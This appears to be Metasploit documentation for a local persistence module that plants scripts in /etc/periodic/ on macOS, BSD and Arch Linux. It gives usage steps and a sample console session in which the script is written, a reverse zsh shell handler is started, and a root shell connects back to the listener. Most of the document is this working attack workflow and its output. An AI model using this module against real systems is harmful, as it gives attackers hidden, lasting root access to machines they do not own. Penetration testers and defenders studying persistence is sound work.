## Description

This module provides a persistence mechanism on OSX, BSD and Arch Linux 
using periodic scripts. The modules will write a script to `/etc/periodic
/daily/`, `/etc/periodic/weekly/` or `/etc/periodic/monthly/`. This 
script will then execute a payload which is written by default to `/tmp/`.

## Verification Steps

1. Obtain a session with super user privilleges, only the root 
user has write permissions to `/etc/periodic/`
2. Do: `use exploit/multi/local/periodic_script_persistence`
3. Do: `set session #`
4. Do: `set target #`
5. Do: `set payload #`
6. Do: `set verbose true`
7. Do: `expoit`

## Options

### PERIODIC_DIR

Periodic Directory to write script eg. /etc/periodic/daily

### PERIODIC_SCRIPT_NAME

Name of periodic script



## Scenarios
```
msf6 exploit(multi/local/periodic_script_persistence) > set session 1
session => 1
msf6 exploit(multi/local/periodic_script_persistence) > run verbose=true 

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. /etc/periodic/daily/ is writable
[*] Writing '/etc/periodic/daily/jX3dG9' (118 bytes) ...
[*] Succesfully wrote periodic script to /etc/periodic/daily/jX3dG9.
[*] Cleanup command 'sudo rm/etc/periodic/daily/jX3dG9'
msf6 exploit(multi/local/periodic_script_persistence) > handler -p cmd/unix/reverse_zsh -P 4444 -H ens39
[*] Payload handler running as background job 4.

msf6 exploit(multi/local/periodic_script_persistence) > [*] Started reverse TCP handler on 192.168.168.219:4444 
[*] Command shell session 6 opened (192.168.168.219:4444 -> 192.168.168.175:49190) at 2025-08-29 17:49:54 +0200
msf6 exploit(multi/local/periodic_script_persistence) > sessions

Active sessions
===============

  Id  Name  Type                 Information           Connection
  --  ----  ----                 -----------           ----------
  1         meterpreter x64/osx  root @ mss-Mac.local  192.168.168.219:4242 -> 192.168.168.175:49165 (192.168.168.175)
  6         shell cmd/unix                             192.168.168.219:4444 -> 192.168.168.175:49190 (192.168.168.175)

msf6 exploit(multi/local/periodic_script_persistence) > sessions 6
[*] Starting interaction with 6...

id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
```